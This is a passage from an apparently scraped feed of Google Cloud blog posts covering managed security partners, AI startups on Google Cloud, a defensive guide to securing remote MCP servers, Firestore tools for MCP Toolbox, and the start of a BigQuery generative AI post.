Prolonged time to value and disruptive deployment: CIOs need security investments to demonstrate value quickly. Deploying new security solutions or migrating from existing ones can be costly and time-consuming, delaying the realization of benefits and increasing risk during transition periods. These complexities can lead to protracted implementation cycles, thereby delaying the realization of anticipated benefits and consequently increasing an organization’s risk exposure throughout the transition period.

Limited resources, talent, and expertise: CISOs often find their teams stretched thin, struggling with the sheer volume of security alerts and manual tasks while often lacking specialized knowledge in emerging threat areas or modern security solutions. The demand for cybersecurity professionals continues to grow faster than the supply of qualified workers. The 2024 ISC2 Cybersecurity Workforce Study estimated a global workforce gap of 4.8 million professionals.

High costs: CEOs often see the cost of building and maintaining internal resources to protect the business, and wonder why they’re not getting the expected return on their investment in terms of successful security outcomes. A purely in-house cybersecurity strategy demands substantial upfront capital investment, ongoing operational costs, and a significant commitment to recruiting and retaining highly specialized talent in a competitive market.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3eed50dcae50>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

An expert, experienced member of the team armed with modern technology

Addressing these challenges effectively requires strategic investments and a clear understanding of where to allocate resources to achieve optimal security outcomes. Approved Google Security Operations MSSP partners are uniquely positioned to help you overcome these hurdles, combining their deep expertise with the power of Google Cloud Security products.

Accelerate time to value and deployment: Google Security Operations MSSP partners can help you to accelerate your security operations modernization journey with tailored migrations and efficient technology deployments. With thousands of security operations transformations and deployments under their belt, MSSP partners can get your company’s rules, detections, alerts, and telemetry sources in production quickly.

Augment resources, talent, and expertise: By using best-in-class tooling like intelligence-driven and AI-enabled Google Cloud Security products, partners can filter out noise and escalate only issues requiring business context, helping to reduce the manual work your team faces.

Drive cost efficiency and better outcomes: Delegating some or all of your organization’s security efforts to external resources such as MSSPs or managed detection and response (MDR) services offers immediate access to specialized expertise, advanced technologies, 24/7 monitoring, and scalable solutions without the overhead of an in-house team.

Why partner with a Google Cloud SecOps MSSP?

Choosing a certified Google Cloud MSSP partner means gaining access to differentiated, end-to-end security solutions powered by Google Cloud Security products, including Google Security Operations, Google Threat Intelligence, and Mandiant Solutions. Our tools provide technical advantages like comprehensive data ingestion from multiple clouds and context-aware detections to prioritize threats.

They can help our partners to deliver unique managed security services offerings tailored to the security requirements of your business. They help you offload security operations strain, increase risk awareness, and significantly reduce response times. They can protect your workloads regardless of location (on-premises or multicloud) and integrate with your existing security investments.

Hear from some of our partners and customers on the value they are seeing:

“In partnership with Google Cloud, we ensure comprehensive protection for your workloads, regardless of their location. We leverage telemetry from your existing security solutions to provide seamless and robust defense. This integrated approach maximizes your security investment and minimizes risk,” said Laurent Besset, deputy CEO, Cyberdefense Ops, I-TRACING.

As an example of the results possible on Google Cloud, Jayesh Barai, VP of Sales at Netenrich, shared a recent customer success story: “We’ve seen customers achieve transformative results by tackling legacy security operations head-on. With Netenrich’s AI-driven Adaptive MDR solution, one client’s security efficacy became remarkable: they reduced their mean time to detect and respond from hours to just 15 minutes and cut monthly security incidents needing manual intervention from nearly 2,000 to fewer than 10. This operational efficiency also drove major cost savings, including a 50% reduction in annual security expenses and an 80% reduction in SOC staffing requirements, dramatically streamlining their ability to integrate new acquisitions in days instead of months.”

“Google Cloud’s global reach and unwavering commitment to security and innovation make it an ideal partner to help us safeguard our clients’ most valuable assets. Google Cloud’s experience and expertise in the field, coupled with its transparent and open approach, instill a level of trust that is essential in today’s interconnected world.” said Scott Goree, senior vice-president, Partners, Alliances, and Ecosystems, Optiv.

Find the right partner

You can learn more about how a Google Cloud MSSP partner can help your organization modernize security operations by visiting our updated MSSP Page.

Read More for the details.

2025 09 18

GCP – How Google Cloud’s AI tech stack powers today’s startups

Tibor Kiss Cloud, Google Cloud gcp

AI has accelerated startup innovation more than any technology since perhaps the internet itself, and we’ve been fortunate to have a front row seat to much of this innovation here at Google Cloud. Nine of the top ten AI labs use Google Cloud, as does nearly every AI unicorn and more than 60% of the world’s gen AI startups overall.

And the trend of AI startups choosing us is accelerating. For example, we’ve seen more than a 20% increase over the past year in the number of newer AI Startups (those who recently raised a Series A or B round) choosing to use Google Cloud.

These startups are building with our differentiated AI stack, which offers leading technology and choice at every layer, including a variety of TPU and GPU specialized chips for compute, and a broad range of models that excel at coding, image and video generation, collaboration, and more.

Today, we’re hosting our first-ever Google’s AI Builders Forum, bringing hundreds of startup founders, and builders together in the heart of Silicon Valley to hear about how Google’s AI, infrastructure, and services, as well as our unique resources to support startups’ growth, can help them build.

We’re also excited to announce momentum with dozens of startup customers who are building platforms, products, and entire businesses on Google Cloud, including:

Afooga, an AI-powered content experimentation factory, enables businesses to generate, test, and distribute content at massive scale from a single hypothesis, automatically optimizing across TikTok, Meta, YouTube, and more. Afooga now leverages Vertex AI and Veo for generative video capabilities.
Anara, a generative AI research assistant, helps users find and understand scientific documents with verifiable AI summaries and insights. It now uses Google Cloud’s scalable infrastructure, AI Studio, and Cloud Functions to power its models and data processing for a global user base.
Aptori, an AI security company, detects vulnerabilities in AI-generated code, prioritizes risks, and automates code fixes in real-time. Now, Aptori uses Gemini to analyze code for security weaknesses and generate context-aware fixes, integrating its AI Security Engineer directly into developer workflows.
aSim, an AI-powered mobile app development tool, allows people to quickly generate, share, and discover mini-apps. Users can now instantly generate an app from a prompt using Gemini models and multimodal capabilities from models like Gemini 2.5 Flash Image (i.e. Nano Banana) and Veo 3.
CerebraAI develops AI software for analyzing non-contrast CT scans (NCCT), with a focus on early stroke and cancer detection. It fine-tunes MedGemma on NCCT images and leverages Gemini’s few-shot generalization capabilities to rapidly adapt its model for various diagnostic tasks.
Clavata.ai delivers an integrated AI governance and safety platform with multi-modal, real-time evaluations powered by Gemini models. Its suite of tools enable proactive policy enforcement, dynamic debugging, iteration, observability, and problem prevention.
Clip Media built Reclip, a social media application that leverages Google’s generative media models like Veo and Imagen to create short, engaging animated videos from real-time audio clips, captured by their proprietary app.
CoVet is an AI assistant built for veterinary professionals, that uses Gemini, Cloud Functions, and other Google Cloud solutions to help veterinary teams automate administrative work, save hours every day, and refocus on what matters most: exceptional patient care.
ColomboAI has built its next-generation social engagement super-app on Google Cloud, integrating search, social, commerce, and news into one experience. The company is now launching CAIRO, its in-app AI Operator agent that can automate actions across modules — from GenAI to feeds, shop, and beyond — powered by Google Cloud AI infrastructure.
Corma is using Google Cloud’s AI infrastructure to train novel, domain-specific foundation models.
Factory, a platform for agent-driven software development, accelerates engineering by unifying context from sources like GitHub and Jira to delegate tasks such as feature development and migrations. It uses Gemini 2.5 Flash for data ingestion and Gemini 2.5 Pro for advanced code and document generation.
Gobii provides AI Agents that automate complex web tasks like forms and workflows directly in the browser. To power these intelligent agents, Gobii is building on Vertex AI and scalable GKE infrastructure.
InstaLILY is using Gemini 2.5 and Vertex AI to power AI agents, called InstaWorkers, that can support sales, service, and operations.
Inworld AI, an AI platform for builders of consumer applications, uses Google Cloud and Gemini to cost-effectively handle tens of millions of concurrent users with response times measured in milliseconds, meeting strict requirements for quality, cost control, and security.
Krea.ai, a creative suite of AI tools, offers real-time image and video generation and personalized model training for artists and marketers. It integrates with Google Cloud to provide access to advanced models like Veo3 and Gemini 2.5 Flash Image (Nano Banana), enabling users to create high-quality ads, product photos, and game assets.
Lovable, which is building an AI software engineer, uses Vertex AI to deploy and unify its core language models, including Gemini and Anthropic’s models. This unique orchestration enables users to create complete, full-stack web applications from plain English descriptions while choosing the model on Google Cloud that best suits their needs.
MaestroQA, a conversation analytics data platform, is now using Gemini to enhance its AI-powered conversation analytics. Gemini helps MaestroQA improve its ability to analyze customer interactions across every channel, providing deeper insights that help businesses boost customer satisfaction and drive growth and retention.
Markups.ai created Agent Marko, an AI contract negotiation agent, which helps turn days-long human legal review into an easier automated process. Users simply email contracts to a designated inbox and receive customized revisions and analysis back within minutes. Gemini 2.5 Pro has enabled Markups.ai to go from handling only first revisions of NDAs to effectively any revision of any contract.
MLtwist, an AI data pipeline services company, processes, transcribes, translates, and labels large, complex data streams for enterprise applications. It now uses Gemini models and AI Studio for transcription and labeling tasks.
MNTN uses Google Cloud to power its connected-TV ad platform which helps users better measure the impact of their TV campaigns. MNTN uses Google’s Security Command Center to ensure users have a secure experience on its platform.
Mosaic lets users build and run multimodal video-editing AI agents. It uses Gemini 2.5 Pro, Cloud Storage, and Cloud Run to power its platform.
OpenArt, an AI video production company, empowers social media creators and SMBs to turn ideas into videos complete with motion, music, and a narrative arc with Gemini models and Veo3.
OpenEvidence is building its AI-powered medical search platform on Google Cloud, enabling healthcare professionals to access medical information more quickly, safely, and accurately.
Owl.AI, Owl.AI, a sports technology company, delivers AI-powered solutions to professional sports leagues. Their offerings, which include judging and scoring, aim to enhance accuracy, consistency, and eliminate bias. Owl.AI achieves this by leveraging AI models built on Gemini and fine-tuned on Google Cloud to analyze real-time video footage of athletic performances.
Parallel uses Gemini models via Vertex AI to orchestrate “micro agents” that can manage AI search requests more effectively.
Prodia, a generative AI API, offers developers APIs to integrate generative AI into their creative tools. Prodia relies on GPUs on Google Cloud to serve text-to-image and instruct-to-edit models, our low-latency network to ensure scalable, cost-effective performance, Dynamic Workload Scheduler for burst capacity, and models like Veo 3 and Gemini 2.5 Flash Image to power advanced video and image generation.
Provenbase has built its talent recruitment tool for businesses on Google Cloud and is now powering its transformative deep search for talent feature using Google Cloud AI.
Qualia Clear is an agentic system that improves real estate closings by automating manual title and escrow workflows. It uses tool calling, Gemini 2.5 Flash and Gemini 2.5 Pro, and Google Agent Development Kit to process emails and documents and simplify reporting, improving efficiency and customer service.
Rembrand is an AI-powered advertising platform that facilitates in-video product placements for content creators and advertisers on social media and connected TV. Powered by Google Cloud’s AI infrastructure, Rembrand enables brands to genuinely connect with audiences without disrupting the content.
Resolve AI, an always-on AI SRE, autonomously investigates incidents and helps run production systems using code, infrastructure, and observability data. With the intelligence and performance of Gemini on Vertex AI, Resolve AI improves MTTR, reliability, and engineering velocity for its customers.
SandboxAQ is scaling its AI-accelerated drug discovery and materials design platform on Google Cloud by training Large Quantitative Models (LQMs) on high-accuracy, physics-based simulations run across massively parallel compute nodes on Google Cloud. SandboxAQ recently made two large-scale datasets, called SAIR and AQCat25, publicly available for building and benchmarking LQMs for structure-aware drug potency prediction and for catalyst design, respectively.
Satlyt, a space compute company, enables in-orbit AI workloads by orchestrating intersatellite communication and routing. It uses Google Kubernetes Engine, Vertex AI, and scalable data infrastructure to deploy AI agents and plans to deploy Google’s Gemma models in orbit.
Satisfi Labs will begin using Gemini models to power a new agentic platform for hundreds of customers in sports, entertainment, and tourism. The Satisfi AI platform will offer specialized agents supporting guest experiences, ticketing, on-site safety, and merchandise. Tuned by industry experts, Satisfi AI helps live experience businesses sell more, service faster, and gain real-time insights.
Savvy, an education-focused AI startup, revolutionizes learning by automatically generating flashcards and quizzes from PDFs, notes, videos, and podcasts. As students answer, Savvy uses Gemini to dynamically grade their answers, providing instant feedback and personalized learning.
Skyvern helps companies automate browser-based workflows with AI. Skyvern uses models like Gemini 2.5 Pro and computer vision to interact with websites, enabling it to automate tasks like filling out forms, procuring materials, and downloading invoices.
Subject.com, an AI-powered platform for grades 6 to 12, blends cinematic storytelling with advanced AI to make learning more engaging. Vertex AI, CloudSQL, and BigQuery power Subject’s teacher assistant tool, Spark, that provides instant feedback, an ‘Explain This’ text simplifier, a 24/7 Homework Helper, and personalized learning tied to student interests.
Tali.ai is a medical AI scribe designed to reduce the administrative burden on clinicians. Integrated with multiple electronic medical record systems across the U.S. and Canada, the company uses Vertex AI and Gemini models to automate clinical note-taking during patient visits and extract key insights.
Tinuiti, a performance marketing agency, used Vertex AI to develop an AI-powered service that develops and optimizes ad copy to increase performance.
Toonsutra, an India-based webcomic platform, is using Google Gemini to go global. By making stories accessible in regional languages and adding Lyria 2 for music, Gemini for voices, and Veo 3 for animation, the company is creating next-generation immersive comics for more audiences.
turbopuffer offers serverless vector and full-text search, helping AI businesses overcome the high costs and complexity of traditional database architectures. Its solution, built on Google Cloud infrastructure, has reduced AI database cost by up to 90% for customers, manages more 1 trillion documents, and handles more than 10 million writes and 10,000 queries every second.
Upwork, a human and AI-powered work marketplace, connects businesses with independent professionals. By leveraging the Vertex AI Text-to-Speech API, Upwork now delivers faster, more accurate talent matching and improved hiring efficiency for clients and freelancers.
Visla is an AI-powered video creation platform that helps businesses and creators produce pro videos in minutes. Using Imagen 4, Gemini Flash Image 2.5, Veo 3, and Visla’s AI Video Agent with Avatars, it adapts visuals and narration while automating polished content creation for learning, training, and marketing.
Windsurf, a leader in AI-assisted coding, is using Gemini 2.5 Pro to power its coding assistance IDE, as well as using Gemini models to support integrations with Cognition’s Devin AI.
Zapia AI, a retail technology company, uses AI agents to support millions of users with product discovery, local business searches, and purchase assistance, resulting in over 90% positive user feedback. Its multi-agent orchestration is powered by Gemini to improve agent reasoning, reduce latency, and lower operational costs.
Zefr supports Fortune 500 brand advertising with safety and suitability on platforms like YouTube and TikTok, using Gemini models and Vertex AI to analyze video, image, audio, and text.

Google Cloud’s differentiated AI stack for startups

Around the world, startups are using Google Cloud at every step of development and every stage of growth. They’re using our AI and infrastructure to train and serve models, to handle multimodal requests, to build and scale applications, to develop AI agents, to manage underlying data, to support developers, to reach customers through our marketplace, and more.

Whatever the use case, our full AI-optimized tech stack provides startups with leading technology and choice at every layer, including:

Highly-performant first-party chips (TPUs) and third-party chips (GPUs) for training and inferencing, as well as the ability to move workloads between the two.
AI Studio, a fast way for startups to get started building applications with our models.
Our unified AI development platform, Vertex AI.
More than 200 AI foundation models, including our leading multimodal models like Nano Banana and Veo 3, and popular third-party models like Anthropic’s Claude and the open-source Llama and Mystral.
Developer tools like Gemini CLI, which provides access to Gemini directly within the coding terminal, streamlining workflows and boosting productivity.
Products like BigQuery and AlloyDB to handle an organization’s underlying data.
Security operations and threat intelligence tools to help startups secure their applications.
Services like Google Kubernetes Engine, Cloud Storage, and CloudSQL to quickly scale workloads and applications up and down.

If you can dream it, then you can build it, launch it, scale it, and sell it with Google Cloud.

More programs, initiatives, and product access for startups

One of the biggest challenges to starting up isn’t having the idea or the right technology — it’s access to the resources to make it happen and expertise to help tackle any challenges that arise.

Google Cloud provides a unique set of resources and benefits for startups through our Google for Startups Cloud Program, including cloud credits that are applicable across all Google Cloud products and AI models — including those from our partners like Anthropic and Meta. The program also offers mentorship and go-to-market programs that help startups reach customers, and even on-the-ground engineers who engage with and support startups as they build.

We also engage deeply with the startup community through our global series of Accelerators and our partnerships with top venture capital firms, incubators, and community organizations — making it easier than ever for startups to access Google Cloud’s unique technology and our extensive set of resources to help startups build and market their products.

For example, AI startups who work with firms like Lightspeed, Sequoia, or Y Combinator all have preferred access to our Google for Startups Cloud Program — supercharging their work with up to $350,000 in cloud credits along with mentorship and engineering support.

We’re committed to making it as easy as possible for startups to get building with Google Cloud AI. If you’re interested in our technology and want to get started, head to Google AI Studio or our Google for Startups Cloud Program and let’s get building together!

Read More for the details.

2025 09 17

GCP – How to secure your remote MCP server on Google Cloud

Tibor Kiss Cloud, Google Cloud gcp

As enterprises increasingly adopt model context protocol (MCP) to extend capabilities of AI models to better integrate with external tools, databases, and APIs, it becomes even more important to ensure secure MCP deployment.

MCP unlocks new capabilities for AI systems; it can also introduce new risks, such as tool poisoning, prompt injection, and dynamic tool manipulation. These can lead to data exfiltration, identity subversion and misuse of AI systems.

Securing an MCP deployment begins with a strong security foundation. Here are five key MCP deployment risks you should be aware of, and how using a centralized proxy architecture on Google Cloud can help mitigate them.

Top five MCP deployment risks you should know

While there are some broader risks unique to AI, these five are especially important to be aware of when designing MCP deployments:

Unauthorized tool exposure: A misconfigured MCP manifest can create a vulnerability that allows unauthorized individuals or agents to access sensitive tools, such as internal administration functions.
Session hijacking: An attacker may steal a legitimate user’s session ID to impersonate them. This allows the attacker to either make unauthorized API calls directly or, in stateful systems, inject malicious payloads into a shared data queue for delivery to the victim’s active session.
Tool shadowing and shadow MCP: Rogue MCP tools, mimicking legitimate services, can be deployed by malicious actors. This deceptive practice can trick both AI agents and human employees into interacting with harmful tools under the belief they are genuine.
Sensitive data exposure and token theft: Improperly configured environments or inadequate data-handling practices can lead to the accidental exposure of sensitive information, such as API keys, credentials, tokens, and personally identifiable information (PII). Attackers can exploit exposed credentials to gain unauthorized access to corporate resources, which could lead to significant data breaches.
Authentication bypass: Weak, misconfigured, or inadequately-enforced authentication mechanisms can be exploited by attackers to circumvent security controls, allowing them to gain unauthorized access by successfully impersonating legitimate users and trusted entities.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x7f53708dba60>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

How a centralized MCP proxy architecture can help

To address these core risks in a scalable manner, we recommend a pattern built around a centralized MCP proxy that acts as a secure intermediary for all communication between clients and MCP servers.

Built on Cloud Run, Apigee, or Google Kubernetes Engine, this intelligent proxy intercepts all tool calls, enforcing your organization’s security policies and providing extensive monitoring. By serving as a centralized security enforcement point, the MCP proxy enables important risk-managing capabilities such as consistent access controls (acts as an authorization server), advanced traffic management, audit logging, secret scanning, resource limits, and real-time threat detection, all without requiring modifications to individual remote MCP servers.

Without centralization, organizations deploying MCP servers face challenges:

Fragmented authentication: Each MCP server enforces its own policies, creating inconsistencies.
Operational overhead: Updating agents with new endpoints is extensive and error-prone.
Security blind spot: Limited visibility into health, usage, and anomalies across distributed MCP servers.
Expended attack surface: Vulnerabilities such as prompt injection, tool poisoning, and unmonitored traffic flows.

A unified MCP proxy on Google Cloud addresses these challenges by:

Enforcing organizational security policies at a single, managed entry point for all MCP requests and responses.
Authenticating and authorizing consistently using the Google Identity Platform.
Centralizing observability through Cloud Logging and Security Command Center.
Standardizing protections against threats, aligned with Google secure AI agent guide and OWASP guidance for agentic AI applications.

Architecture overview

The following reference architecture shows how Google Cloud services help secure MCP client requests end-to-end.

Layered security controls on Google Cloud.

Key components:

Global Load Balancing provides a single entry point for all MCP client traffic.
Certificate Manager manages TLS certificates for secure communication.
Cloud Armor provides DDoS and WAF protections against common OWASP web threats.
MCP Proxy acts as the central enforcement layer for authentication, authorization, request inspection, and routing.
Google Identity Platform validates identities and issues OAuth 2.0 tokens.
Model Armor screens model prompts and responses for prompt injection and jailbreak detection, sensitive data, and can help ensure responsible AI practices.
Secret Manager stores API keys, database credentials, and sensitive configuration values.
Artifact Registry ensures MCP server images are scanned, verified and encrypted at rest with customer managed encryption keys.
Internal Load Balancing routes sanitized traffic to the appropriate MCP servers.
Cloud Logging and Security Command Center deliver visibility, anomaly detection, and compliance reporting.

Layered security controls

Google Cloud applies security at every layer of the architecture. Let’s dig into these capabilities below.

Network-level security control

Network segmentation can isolate MCP tools servers, load balancers, and databases using virtual private networks (VPC), Cloud Run ingress, and Cloud Run egress options to reduce lateral movement risk.
Web attack and DDOS protection can help block malicious traffic, enforce IP allow and deny lists, and provide resilience against DDoS attacks with Global Load Balancer with Cloud Armor.
Advanced traffic management can help provide custom domain path matching for MCP tool servers, using Internal Application Load Balancer (ALB) with advanced traffic management capabilities. By inspecting the incoming request host and path, the ALB intelligently directs requests to the appropriate backend service or instance of your MCP server.

The backend service supports various back end types which can be MCP servers deployed in Google Cloud (such as VMs, Cloud Run, and Google Kubernetes Engine), in a remote network (using hybrid NEG) or on the internet (using internet NEG).

Advanced Traffic Management uses Internal Application Load Balancer to help provide custom domain path matching for MCP tool servers.

code_block: <ListValue: [StructValue([(‘code’, ‘defaultService: projects/PROJECT_ID/global/backendServices/mcp-tool-weatherrn name: matcher1rn routeRules:rn – matchRules:rn – prefixMatch: /weatherrn priority: 1rn routeAction:rn weightedBackendServices:rn – backendService: projects/PROJECT_ID/global/backendServices/mcp-tool-weatherrn weight: 100rn urlRewrite:rn pathPrefixRewrite: “/new-path-1/”rn hostRewrite: “new-host-name.com” rn – matchRules:rn – prefixMatch: /mathrn priority: 2rn routeAction:rn weightedBackendServices:rn – backendService: projects/PROJECT_ID/global/backendServices/mcp-tool-mathrn weight: 101rn urlRewrite:rn pathPrefixRewrite: “/new-path-2/”rn hostRewrite: “new-host-name.com”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f53713be520>)])]>

Authentication and authorization

The MCP proxy functions as the MCP Authorization Service (MAS) and integrates with an external Identity provider (such as Google Identity Platform, Okta, and Entra ID). This allows for secure access to your MCP server without the need to build and maintain a complex identity system.

This highly scalable and reliable authentication solution can help users securely authenticate through their existing identity platform. Additionally, Cloud Identity and Access Management (IAM) can enable enforcement of role-based access, and restrict access to cloud resources.

MCP authentication and authorization flow.

Protection in-line MCP client prompt and response with Model Armor

Proxy leverages Model Armor to provide robust, real-time protection against runtime threats like prompt injection, jailbreaking, tool poisoning, dynamic tool manipulation, and sensitive data leakage.

Using Model Armor templates, you can configure the MCP client prompts to be scrutinized and sanitized by Model Armor before being forwarded to the application load balancer. This process ensures that only sanitized prompts reach your MCP tools servers, thereby preventing unintended actions.

code_block: <ListValue: [StructValue([(‘code’, ‘filterConfig:rn maliciousUriFilterSettings:rn filterEnforcement: ENABLEDrn piAndJailbreakFilterSettings:rn confidenceLevel: MEDIUM_AND_ABOVErn filterEnforcement: ENABLEDrn raiSettings:rn raiFilters:rn – confidenceLevel: MEDIUM_AND_ABOVErn filterType: HATE_SPEECHrn – confidenceLevel: MEDIUM_AND_ABOVErn filterType: DANGEROUSrn – confidenceLevel: MEDIUM_AND_ABOVErn filterType: SEXUALLY_EXPLICITrn – confidenceLevel: MEDIUM_AND_ABOVErn filterType: HARASSMENTrn sdpSettings:rn basicConfig:rn filterEnforcement: ENABLEDrnname: projects/project-id/locations/location/templates/MCP-Proxy-templaterntemplateMetadata:rn multiLanguageDetection:rn enableMultiLanguageDetection: true’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f53713be640>)])]>

Logging and auditing

All actions performed by MCP clients will be logged by the proxy to Cloud Logging, such as accessing specific tools, modifying or writing to memory locations, initiating or receiving communication. The log will include a timestamp, agent ID, session ID, payload, and input/output signature fingerprints.

The comprehensive nature of these logs, combined with the detailed metadata, can help administrators and auditors collect the necessary information to reconstruct client activities, identify anomalies, and enforce security policies effectively.

Additional security controls

In addition to layered security controls, a robust defense-in-depth strategy requires continuous monitoring and proactive measures to identify and mitigate threats.

Secrets scanning with Sensitive Data Protection

Sensitive Data Protection (SDP) discovery periodically scans the MCP Tools server on Cloud Run, specifically targeting the detection of hardcoded secrets. This proactive measure involves regular scans of the server’s build and runtime environment variables.

These scans detect insecure coding-practice risks, such as instances where sensitive information (including API keys, database credentials, and access tokens) has been inadvertently embedded directly in the code or configuration.

Vulnerability scanning

MCP server images stored in Artifact Registry are scanned for vulnerabilities before they are deployed. When a new image is pushed to Artifact Registry, it is automatically scanned for known vulnerabilities, providing actionable insights into potential weaknesses.

You can enforce policies that block the deployment of images with critical vulnerabilities as part of securing your environment from the ground up.

Threat detection

Security Command Center (SCC) provides AI protection that helps manage the security posture of your AI workloads by detecting threats and helping with mitigating risks to AI asset inventories. This includes managing threats to the MCP deployment through detection, investigation, and response.

SCC can also identify unauthorized access and data exfiltration attempts, delivering real-time alerts and remediation recommendations.

AI Protection helps you manage the security posture of your AI workloads by detecting threats and helping you to mitigate risks to your AI asset inventory.

Bring it all together

By strategically implementing these Google Cloud security services, you can establish a secure and resilient environment for your Model Context Protocol remote servers. Prioritizing authentication, network security, data protection, and continuous monitoring will ensure the integrity and confidentiality of your AI models and the sensitive information they process.

This unified, Zero Trust approach can help mitigate emerging AI-specific risks, and also provide a scalable and future-proof foundation for the evolution of your AI-driven applications.

To learn more about securing your AI workload, please refer to our documentation.

Read More for the details.

2025 09 17

GCP – Announcing MCP Toolbox support for Firestore

Tibor Kiss Cloud, Google Cloud gcp

MCP Toolbox for Databases (Toolbox) is an open-source MCP server that makes it easy for developers to connect gen AI agents to enterprise data, with initial support for databases like BigQuery, AlloyDB, Cloud SQL, and Spanner. Since launching earlier this year, Toolbox has made it easier for millions of developers to access enterprise data in databases.

Today, we’re expanding Toolbox with a comprehensive new set of tools for Firestore. This will help developers build more modern web and mobile applications. Let’s explore how these new capabilities can improve your development process.

What MCP is, and how it unlocks AI-assisted workflows

MCP is an emerging open standard for connecting AI systems with tools and data sources through a standardized protocol, replacing fragmented, custom integrations. Think of MCP as a universal adapter for AI, allowing any compatible assistant to plug into any tool or database without needing a custom-built connector each time. Now with the MCP Toolbox, these assistants (such as those in an IDE or a CLI like the Gemini CLI) can connect directly to your Firestore database.

This is a massive step for AI-assisted workflows, from debugging data and testing security rules to managing your collections—all using natural language. For instance, a developer building a retail app can now ask their assistant, ‘Find all users whose wishlists contain discontinued product IDs,’ to perform data cleanup, without writing a single line of code.

Let’s explore how these new capabilities can improve your development process.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x7f536c5b1580>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

AI-assisted development meets the NoSQL world

As you carry out AI-assisted tasks, you’re probably looking for the most efficient way to interact with your data. Our new pre-built tools for Firestore enable you to do just that, directly from your Gemini CLI or other AI-powered development environment.

Firestore’s flexible document structure and powerful security rules offer unique capabilities for building modern mobile and web applications. These tools are crafted to empower the Firestore developer, helping them master both the flexibility of the document model and the creation of robust access controls that protect their app. You can now use your AI assistant to perform queries, carry out targeted document updates, and even validate your security rules before you deploy them, saving you time and preventing errors.

From QA bug to resilient feature: A developer’s story

Let’s take a hypothetical example. Alex is a full-stack developer on a team building a new e-commerce application using Firestore. She uses Gemini CLI to help her code, debug, and test. This morning, a high-priority bug was filed by the QA team: an issue in the staging environment is causing items to reappear in a user’s “wishlist” after being removed. Because of the blog, her release was blocked.

The bug hunt begins

Until now, investigating a bug meant Alex would have to manually click through the Cloud Console to inspect test documents or write a custom script just to query the staging database—a slow and cumbersome process. Now, she can simply have a conversation with Gemini CLI.

The bug report contains the test user accounts. Alex opens her terminal and asks:

“Hey, show me the Firestore data for the test users qa_user_123 and qa_user_456 from the users-staging collection.”

Gemini CLI understands this, calls the firestore-get-documents tool, and instantly displays the JSON for both user documents. Alex confirms the bug—the wishlist array contains stale data. She continues the conversation to understand the scope:

“Okay, that’s the bug. Find all users in the users-staging collection whose wishlist contains product-glasses(inactive).”

CLI uses the firestore-query-collection tool and reports back that 20 test accounts are affected. After developing a code fix, she needs to clean the test environment to verify it.

“For all 20 test users you just found, please remove product-glasses(inactive) from their wishlist.”

Gemini CLI confirms the plan and uses the firestore-update-document tool to perform the cleanup, clearing the way for a successful re-test.

From reactive fix to proactive hardening

The immediate bug is fixed, but Alex wants to ensure this class of error can never happen again. She decides to enforce the correct data structure with Firestore Security Rules.

Until now, validating security rules meant a disruptive context switch. Alex would have to copy her rules, navigate away from her terminal to the Firebase Console’s Rules Playground, or set up a local emulator just to check for syntax errors. This friction often discourages thorough, iterative testing within the main development loop.

Now, Alex drafts her new, stricter security rule. Before deploying, she asks Gemini CLI for a pre-flight check right from her terminal:

“new_rules.txt is a new Firestore Security Rule I’m working on for staging. Can you validate it for me?”

CLI uses the firestore-validate-rules tool and replies, “The issue is a missing semicolon at the end of the return statement” Alex fixes the typo instantly. For a final check, she asks:

“Show me the active Firestore security rules for this project.”

Using the firestore-get-rules tool, CLI displays the current ruleset, allowing Alex to do a final comparison. Confident and assured, she deploys her changes.

A task that could have taken hours of manual investigation, scripting, and context switching was completed in minutes. Alex didn’t just fix a bug; she used her AI assistant to make the entire application more resilient.

Getting started

These new Firestore tools within the MCP Toolbox represent our commitment to providing you with powerful, intuitive tools that accelerate the entire development lifecycle. By connecting your Firestore database directly to your AI assistant, you can spend less time on tedious tasks and more time building incredible applications.

Learn more about MCP Toolbox for Databases, connect it to your favorite AI-assisted coding platform, and experience the future of AI-accelerated, database-connected software development today.

Read More for the details.

2025 09 17

GCP – BigQuery under the hood: Scalability, reliability and usability enhancements for gen AI inference

Tibor Kiss Cloud, Google Cloud gcp

People often think of BigQuery in the context of data warehousing and analytics, but it is a crucial part of the AI ecosystem as well. And today, we’re excited to share significant performance improvements to BigQuery that make it even easier to extract insights from your data with generative AI.

In addition to native model inference where computation takes place entirely in BigQuery, we offer several batch-oriented generative AI capabilities that combine distributed execution in BigQuery with distributed execution with remote LLM inference on Vertex AI, with functions such as:

ML.GENERATE_TEXT to generate text via Gemini, other Google-hosted partner LLMs (e.g., Anthropic Claude, Llama) or any open-source LLMs
ML.GENERATE_EMBEDDING to generate text or multimodal embeddings
AI.GENERATE_TABLE to generate structured tabular data via LLMs and their constrained decoding capabilities.

In addition to the above table-valued functions, you can use our row-wise functions such as AI.GENERATE for more convenient SQL query composition. All these functions are compatible with text data in managed tables and unstructured object files, such as images and documents. Thanks to the performance improvements we are unveiling today, users can expect dramatic gains in scalability, reliability, and usability across BigQuery and BigQuery ML:

Scalability: Over 100x gain for first-party LLM models (tens of millions of rows per six-hour job), over 30x gain for first-party embedding models (tens to hundreds of millions rows per six-hour job), and added support for Provisioned Throughput quotas.
Reliability: Over 99.99% LLM inference query completion without any row failures; and over 99.99% row-level success rate across all jobs, with the rare per-row failures being easily retriable without failing the query.
Usability: Enhanced user experience by supporting default connections, enabling global endpoints. We also enabled a single place for quota management (in Vertex AI) by automatically retrieving quota from Vertex AI to BigQuery.

Let’s take a closer look at these improvements.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x7f536c5d4850>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

1. Scalability

